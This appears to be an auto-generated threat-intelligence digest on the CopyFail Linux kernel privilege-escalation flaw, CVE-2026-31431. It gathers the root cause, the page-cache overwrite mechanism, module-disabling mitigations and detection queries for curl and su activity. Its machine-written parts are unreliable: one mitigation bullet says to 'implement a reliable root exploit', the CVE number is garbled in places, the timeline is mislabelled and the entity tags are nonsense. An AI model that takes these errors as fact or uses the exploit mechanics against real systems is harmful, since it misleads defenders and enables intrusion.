INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).

Copy Fail Exploit Kit Exploits Linux Flaw

| 2026-05-05 15:01 HIGH HIGH
JSON
Executive Summary AI-generated
The newly-disclosed Linux kernel bug dubbed "CopyFail" is already being exploited by attackers, just days after researchers dropped a reliable root-level exploit. This fresh flaw in the Linux kernel gives low-level users a way to take full control of systems by modifying data they should only be able to read, effectively turning limited access into full root privileges on unpatched machines.
Technical Mitigations AI-generated
• Implement a reliable root exploit to bypass the "CopyFail" Linux flaw. • Patch mainstream Linux kernel distributions built since 2017 with priority. • Provide users with clear instructions on how to patch systems within two weeks.
Technical Observables
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
CVE-2026-314331CVE-2026-314331 CVE-2026-31431CVE-2026-31431
Target & Sectors
NORTH_AMERICA NORTH_AMERICA MIDDLE_EAST MIDDLE_EAST EUROPE EUROPE governmentgovernment
Incident Timeline
‎March 23
Threat actors exploited the recently disclosed 'CopyFail' Linux flaw.
infrastructure Linux
The issue was disclosed by cybersecurity consultancy Theori , which said the flaw was discovered by its AI-powered penetration testing platform, Xint, and reported to the Linux kernel security team on March 23.
‎2026/04/28
The Register reported that attackers are exploiting a recently disclosed 'CopyFail' Linux flaw to gain unauthorized access.
organisation The Register
As The Register reported last week, the flaw stems from how the kernel handles certain cryptographic operations , opening a path to tamper with cached data in ways that were never meant to be user-controlled.
‎April 29, 2026
Researchers publicly disclosed a highly reliable local privilege escalation vulnerability tracked as CVE-2026-31431 on April 29, 2026.
vulnerability CVE-2026-31431
Executive Summary On April 29, 2026, researchers publicly disclosed a highly reliable local privilege escalation (LPE) vulnerability tracked as CVE-2026-31431 .
tactic Privilege Escalation
Executive Summary On April 29, 2026, researchers publicly disclosed a highly reliable local privilege escalation (LPE) vulnerability tracked as CVE-2026-31431 .
organisation LPE
Executive Summary On April 29, 2026, researchers publicly disclosed a highly reliable local privilege escalation (LPE) vulnerability tracked as CVE-2026-31431 .
‎2026/05/05
Attackers are cashing in on fresh 'CopyFail' Linux flaw.
infrastructure Linux
Vulnerabilities Discussed  CVE-2026-31431 Details of CVE-2026-31431 The vulnerability tracked as CVE-2026-31431, known as Copy Fail, is a deterministic logic flaw located in the Linux kernel's cryptographic subsystem, specifically within the algif_aead module of the AF_ALG interface.
Attackers are cashing in on fresh 'CopyFail' Linux flaw.
Cyber-crime Attackers are cashing in on fresh 'CopyFail' Linux flaw Researchers dropped a reliable root exploit and it didn’t sit idle for long CISA is warning that a newly-disclosed Linux kernel bug dubbed "CopyFail" is already being exploited, just days after researchers dropped a working root-level exploit.
Tracked as CVE-2026-31431, the bug sits in the Linux kernel and gives low-level users a way to take full control of a system by modifying data they should only be able to read, effectively turning limited access into full root privileges on unpatched machines.
Major Linux distributions pushed out patches ahead of public disclosure, which Theori published alongside a proof-of-concept exploit.
The Python-based code works against Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 10.1, and SUSE 16, but the researchers warned that every mainstream Linux kernel built since 2017 is in scope of potential exploitation.
The same exploit binary works unmodified on every Linux distribution," Theori says.
CISA is warning that a newly-disclosed Linux kernel bug dubbed "CopyFail" is already being exploited, just days after researchers dropped a working root-level exploit.
Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years.
Discovered in about an hour through an AI-assisted process , this logic flaw allows an unprivileged local attacker to consistently escalate their access to root across virtually all major Linux distributions released since 2017.
A single 732-byte Python script can successfully exploit it without any modification across different Linux distributions.
The vulnerability originates in the Linux kernel's cryptographic subsystem, specifically within the algif_aead module of the AF_ALG interface (a user space crypto API).
Impacted versions include Linux kernels between 4.14 and 6.19.12.
This vulnerability affects millions of systems running mainstream distributions such as Ubuntu , Amazon Linux, Red Hat Enterprise Linux , Debian , SUSE and AlmaLinux.
Palo Alto Networks customers receive protections from and mitigations for CVE-2026-31431 through the following products: The Linux Foundation has posted an advisory with mitigation details for CVE-2026-314331.
The Root Cause The flaw originates from a buggy in-place optimization introduced to the Linux kernel in 2017 (commit 72548b093ee3 ) for AEAD encryption.
Exploit Characteristics What makes Copy Fail exceptionally severe compared to previous Linux LPE vulnerabilities like Dirty Cow or Dirty Pipe is its reliability and simplicity: No race conditions or offsets : It is a straight-line logic flaw that does not rely on winning a race condition window or guessing kernel-specific memory offsets. 100% reliability : The exploit is deterministic and fires successfully on the first attempt.
This same script works unmodified across virtually all major Linux distributions shipped since 2017.
Interim Guidance for CVE-2026-31431 The vulnerability has been resolved in upstream Linux kernel stable branches by reverting the flawed 2017 optimization ( commit a664bf3d603d ).
This can be accomplished by running the following commands as root to block the module's loading and remove it from the kernel: echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead The Linux Foundation has posted an advisory with mitigation details for CVE-2026-314331.
Cortex Cloud 2.1 can detect and prevent malicious operations using behavioral and AI-enabled analytics to detect when attackers target Linux endpoints, including containers and virtual machines.
organisation Theori
Major Linux distributions pushed out patches ahead of public disclosure, which Theori published alongside a proof-of-concept exploit.
organisation Ubuntu 24.04 LTS
The Python-based code works against Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 10.1, and SUSE 16, but the researchers warned that every mainstream Linux kernel built since 2017 is in scope of potential exploitation.
organisation Amazon Linux 2023
The Python-based code works against Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 10.1, and SUSE 16, but the researchers warned that every mainstream Linux kernel built since 2017 is in scope of potential exploitation.
organisation Copy Fail: What You Need
Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years.
data_breach 732 byte
A single 732-byte Python script can successfully exploit it without any modification across different Linux distributions.
High portability : The exploit can be executed using a standalone 732-byte Python script that relies solely on standard libraries (os, socket, zlib), meaning no compilation or external dependencies are required.
organisation API
The vulnerability originates in the Linux kernel's cryptographic subsystem, specifically within the algif_aead module of the AF_ALG interface (a user space crypto API).
infrastructure 4.14
Impacted versions include Linux kernels between 4.14 and 6.19.12.
infrastructure 6.19.12
Impacted versions include Linux kernels between 4.14 and 6.19.12.
organisation Amazon Linux
This vulnerability affects millions of systems running mainstream distributions such as Ubuntu , Amazon Linux, Red Hat Enterprise Linux , Debian , SUSE and AlmaLinux.
organisation Red Hat Enterprise
This vulnerability affects millions of systems running mainstream distributions such as Ubuntu , Amazon Linux, Red Hat Enterprise Linux , Debian , SUSE and AlmaLinux.
organisation SUSE
This vulnerability affects millions of systems running mainstream distributions such as Ubuntu , Amazon Linux, Red Hat Enterprise Linux , Debian , SUSE and AlmaLinux.
organisation AlmaLinux
This vulnerability affects millions of systems running mainstream distributions such as Ubuntu , Amazon Linux, Red Hat Enterprise Linux , Debian , SUSE and AlmaLinux.
organisation CVE-2026-31431
Palo Alto Networks customers receive protections from and mitigations for CVE-2026-31431 through the following products: The Linux Foundation has posted an advisory with mitigation details for CVE-2026-314331.
organisation CVE-2026-314331
Palo Alto Networks customers receive protections from and mitigations for CVE-2026-31431 through the following products: The Linux Foundation has posted an advisory with mitigation details for CVE-2026-314331.
organisation The Linux Foundation
Palo Alto Networks customers receive protections from and mitigations for CVE-2026-31431 through the following products: The Linux Foundation has posted an advisory with mitigation details for CVE-2026-314331.
organisation The Root Cause The
The Root Cause The flaw originates from a buggy in-place optimization introduced to the Linux kernel in 2017 (commit 72548b093ee3 ) for AEAD encryption.
organisation zlib
High portability : The exploit can be executed using a standalone 732-byte Python script that relies solely on standard libraries (os, socket, zlib), meaning no compilation or external dependencies are required.
organisation PoC
"Given the availability of a fully working exploit proof-of-concept (PoC) and the race to patch systems, Microsoft Defender is seeing preliminary testing activity that might result most likely in increased threat actor exploitation over the next few days," the company warned.
Title: CopyFail Proof of Concept Code Execution // Description: Query looks for potential CopyFail proof of concept (POC) code execution via identifying potentially correlated curl and su process executions.
This is especially important, given that a highly reliable proof-of-concept (PoC) script is already publicly available and preliminary testing activity has been observed.
organisation Microsoft Defender
"Given the availability of a fully working exploit proof-of-concept (PoC) and the race to patch systems, Microsoft Defender is seeing preliminary testing activity that might result most likely in increased threat actor exploitation over the next few days," the company warned.
organisation CVE
Unit 42 Managed Threat Hunting Queries The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using Cortex XDR and the XQL queries below.
organisation Cortex XDR
Unit 42 Managed Threat Hunting Queries The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using Cortex XDR and the XQL queries below.
organisation XQL
Unit 42 Managed Threat Hunting Queries The Unit 42 Managed Threat Hunting team continues to track any attempts to exploit this CVE across our customers, using Cortex XDR and the XQL queries below.
organisation TTP
// MITRE ATT&CK TTP ID: T1068   dataset = xdr_data | fields _time , agent_hostname , agent_os_type , event_type , event_sub_type , actor_effective_username , actor_effective_user_sid , actor_process_image_path , actor_process_image_name , actor_process_command_line , actor_process_image_sha256 , action_process_image_name , action_process_image_command_line , action_process_user_sid | filter      event_type = ENUM .
organisation Copy Fail
This vulnerability is commonly referred to as Copy Fail.
organisation AEAD
Rather than a single coding error, the flaw resulted from a combination of three independent updates: The addition of the authencesn algorithm in 2011 The AF_ALG interface gaining AEAD support in 2015 A fatal in-place optimization introduced in 2017 During cryptographic operations, an in-place optimization bug causes the algorithm to use the destination buffer improperly, writing four controlled bytes past the legitimate region directly into the system's file page cache.
organisation Kubernetes
Because the kernel and its page cache are shared across an entire node, this flaw allows attackers to: Easily break out of Kubernetes containers Overtake multi-tenant hosts Compromise continuous integration and continuous delivery (CI/CD) pipelines We strongly urge organizations to patch their systems immediately by applying vendor-issued kernel updates.
organisation CI
Because the kernel and its page cache are shared across an entire node, this flaw allows attackers to: Easily break out of Kubernetes containers Overtake multi-tenant hosts Compromise continuous integration and continuous delivery (CI/CD) pipelines We strongly urge organizations to patch their systems immediately by applying vendor-issued kernel updates.
organisation IPsec
The authencesn algorithm is used for IPsec extended sequence number (ESN) support and uses the destination buffer as a scratch pad to rearrange these sequence numbers.
organisation ESN
The authencesn algorithm is used for IPsec extended sequence number (ESN) support and uses the destination buffer as a scratch pad to rearrange these sequence numbers.
organisation the Associated Authenticated Data
The attacker controls the exact four-byte overwrite value by supplying the seqno_lo (the low half of the sequence number) inside bytes 4–7 of the Associated Authenticated Data (AAD) during the sendmsg() call.
organisation Exploitation Via the
Exploitation Via the Page Cache The page cache is the temporary in-memory copy of a file that the kernel reads when it loads a binary for execution.
organisation UID
When the binary is executed, it grants the attacker superuser (UID 0 ) privileges, effectively breaking the kernel's trust boundaries. Stealth : Because this corruption occurs entirely in the system's RAM, the physical file on the disk remains completely unmodified.
organisation RAM
When the binary is executed, it grants the attacker superuser (UID 0 ) privileges, effectively breaking the kernel's trust boundaries. Stealth : Because this corruption occurs entirely in the system's RAM, the physical file on the disk remains completely unmodified.
organisation VFS
This bypasses traditional virtual file system (VFS) paths and file integrity monitoring tools.
organisation CopyFail Detection
Title: CopyFail Detection via Non-root Launching su via Uncommon Parent Process // Description: Query looks for non-root users launching the switch user (su) process via a parent process other than the normally expected processes such as shells, sudo, or su itself.
organisation Uncommon Parent Process // Description
Title: CopyFail Detection via Non-root Launching su via Uncommon Parent Process // Description: Query looks for non-root users launching the switch user (su) process via a parent process other than the normally expected processes such as shells, sudo, or su itself.
organisation PROCESS_START
PROCESS_START      and agent_os_type = ENUM .
organisation CopyFail POC
May identify false positives, yet works well for identification of CopyFail POC provided by Xint.
organisation XSIAM
Cortex XDR and XSIAM Cortex XDR and XSIAM help protect against the threats described in this article, using the multi-layer protection approach, including Advanced WildFire , Endpoint Protection Modules (EPM), Behavioral Threat Protection and the Local Analysis module.
organisation EPM
Cortex XDR and XSIAM Cortex XDR and XSIAM help protect against the threats described in this article, using the multi-layer protection approach, including Advanced WildFire , Endpoint Protection Modules (EPM), Behavioral Threat Protection and the Local Analysis module.
organisation Behavioral Threat Protection
Cortex XDR and XSIAM Cortex XDR and XSIAM help protect against the threats described in this article, using the multi-layer protection approach, including Advanced WildFire , Endpoint Protection Modules (EPM), Behavioral Threat Protection and the Local Analysis module.
organisation the Local Analysis
Cortex XDR and XSIAM Cortex XDR and XSIAM help protect against the threats described in this article, using the multi-layer protection approach, including Advanced WildFire , Endpoint Protection Modules (EPM), Behavioral Threat Protection and the Local Analysis module.
organisation IAM
Additionally, it can detect when cloud platform IAM policies associated with those targeted endpoints are being misused and alert teams when assets are vulnerable to these threats.
‎May 15
Threat actors are using the recently disclosed 'CopyFail' Linux vulnerability to target Federal Civilian Executive Branch agencies.
target_region United States
The CISA, the US government's cybersecurity agency, has added the bug to its Known Exploited Vulnerabilities catalog and ordered Federal Civilian Executive Branch agencies to patch within two weeks, setting a May 15 deadline.
industry Government
The CISA, the US government's cybersecurity agency, has added the bug to its Known Exploited Vulnerabilities catalog and ordered Federal Civilian Executive Branch agencies to patch within two weeks, setting a May 15 deadline.
attribution Known Exploited
The CISA, the US government's cybersecurity agency, has added the bug to its Known Exploited Vulnerabilities catalog and ordered Federal Civilian Executive Branch agencies to patch within two weeks, setting a May 15 deadline.
tactic T1588.006 - Vulnerabilities
The CISA, the US government's cybersecurity agency, has added the bug to its Known Exploited Vulnerabilities catalog and ordered Federal Civilian Executive Branch agencies to patch within two weeks, setting a May 15 deadline.
attribution Federal Civilian Executive Branch
The CISA, the US government's cybersecurity agency, has added the bug to its Known Exploited Vulnerabilities catalog and ordered Federal Civilian Executive Branch agencies to patch within two weeks, setting a May 15 deadline.
Tactical Metrics
Metrics
infrastructure
‎Linux
Affected Product
Attackers are cashing in on fresh 'CopyFail' Linux flaw.
Cyber-crime Attackers are cashing in on fresh 'CopyFail' Linux flaw Researchers dropped a reliable root exploit and it didn’t sit idle for long CISA is warning that a newly-disclosed Linux kernel bug dubbed "CopyFail" is already being exploited, just days after researchers dropped a working root-level exploit.
Tracked as CVE-2026-31431, the bug sits in the Linux kernel and gives low-level users a way to take full control of a system by modifying data they should only be able to read, effectively turning limited access into full root privileges on unpatched machines.
The issue was disclosed by cybersecurity consultancy Theori , which said the flaw was discovered by its AI-powered penetration testing platform, Xint, and reported to the Linux kernel security team on March 23.
Major Linux distributions pushed out patches ahead of public disclosure, which Theori published alongside a proof-of-concept exploit.
The Python-based code works against Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 10.1, and SUSE 16, but the researchers warned that every mainstream Linux kernel built since 2017 is in scope of potential exploitation.
The same exploit binary works unmodified on every Linux distribution," Theori says.
CISA is warning that a newly-disclosed Linux kernel bug dubbed "CopyFail" is already being exploited, just days after researchers dropped a working root-level exploit.
Copy Fail: What You Need to Know About the Most Severe Linux Threat in Years.
Discovered in about an hour through an AI-assisted process , this logic flaw allows an unprivileged local attacker to consistently escalate their access to root across virtually all major Linux distributions released since 2017.
A single 732-byte Python script can successfully exploit it without any modification across different Linux distributions.
The vulnerability originates in the Linux kernel's cryptographic subsystem, specifically within the algif_aead module of the AF_ALG interface (a user space crypto API).
Impacted versions include Linux kernels between 4.14 and 6.19.12.
This vulnerability affects millions of systems running mainstream distributions such as Ubuntu , Amazon Linux, Red Hat Enterprise Linux , Debian , SUSE and AlmaLinux.
Palo Alto Networks customers receive protections from and mitigations for CVE-2026-31431 through the following products: The Linux Foundation has posted an advisory with mitigation details for CVE-2026-314331.
Vulnerabilities Discussed  CVE-2026-31431 Details of CVE-2026-31431 The vulnerability tracked as CVE-2026-31431, known as Copy Fail, is a deterministic logic flaw located in the Linux kernel's cryptographic subsystem, specifically within the algif_aead module of the AF_ALG interface.
The Root Cause The flaw originates from a buggy in-place optimization introduced to the Linux kernel in 2017 (commit 72548b093ee3 ) for AEAD encryption.
Exploit Characteristics What makes Copy Fail exceptionally severe compared to previous Linux LPE vulnerabilities like Dirty Cow or Dirty Pipe is its reliability and simplicity: No race conditions or offsets : It is a straight-line logic flaw that does not rely on winning a race condition window or guessing kernel-specific memory offsets. 100% reliability : The exploit is deterministic and fires successfully on the first attempt.
This same script works unmodified across virtually all major Linux distributions shipped since 2017.
Interim Guidance for CVE-2026-31431 The vulnerability has been resolved in upstream Linux kernel stable branches by reverting the flawed 2017 optimization ( commit a664bf3d603d ).
This can be accomplished by running the following commands as root to block the module's loading and remove it from the kernel: echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead The Linux Foundation has posted an advisory with mitigation details for CVE-2026-314331.
Cortex Cloud 2.1 can detect and prevent malicious operations using behavioral and AI-enabled analytics to detect when attackers target Linux endpoints, including containers and virtual machines.
Metrics
data_breach
732
Byte
A single 732-byte Python script can successfully exploit it without any modification across different Linux distributions.
High portability : The exploit can be executed using a standalone 732-byte Python script that relies solely on standard libraries (os, socket, zlib), meaning no compilation or external dependencies are required.
Metrics
infrastructure
‎4.14
Software Version
Impacted versions include Linux kernels between 4.14 and 6.19.12.
Metrics
infrastructure
‎6.19.12
Software Version
Impacted versions include Linux kernels between 4.14 and 6.19.12.
Intelligence Sources
The Register - Cybercrime 2026-05-05
Palo Alto 2026-05-05
The Register - Cybercrime 2026-05-05